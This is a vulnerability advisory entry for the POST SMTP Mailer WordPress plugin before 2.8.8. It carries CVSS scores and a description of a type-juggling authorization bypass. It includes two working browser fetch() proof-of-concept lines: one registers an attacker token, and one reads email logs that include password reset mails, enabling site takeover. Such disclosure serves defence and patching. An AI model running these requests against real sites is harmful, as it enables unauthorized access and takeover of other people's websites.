Lucene search

K
wpexploitWpvulndbWPEX-ID:B66C4057-E3D5-4A92-A319-F3E36441270F
HistoryJan 11, 2024 - 12:00 a.m.

POST SMTP Mailer < 2.8.8 - Authorization Bypass via type connect-app API

2024-01-1100:00:00
wpvulndb
87
smtp mailer
authorization bypass
api
unauthenticated browser
email logs
exploit

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.6 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.033 Low

EPSS

Percentile

91.3%

Description The plugin is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.

In an unauthenticated browser window on the site frontend, run the following code to authenticate:

await (await fetch( '/wp-json/post-smtp/v1/connect-app', { method: 'POST', headers: { 'fcm-token': 'mytoken', 'device': 'mydevice' } } ) ).text();

Then the email logs can be obtained using the following code:

await (await fetch( '/wp-json/post-smtp/v1/get-logs', { method: 'GET', headers: { 'fcm-token': 'mytoken' } } ) ).text();

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.6 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.033 Low

EPSS

Percentile

91.3%

Related for WPEX-ID:B66C4057-E3D5-4A92-A319-F3E36441270F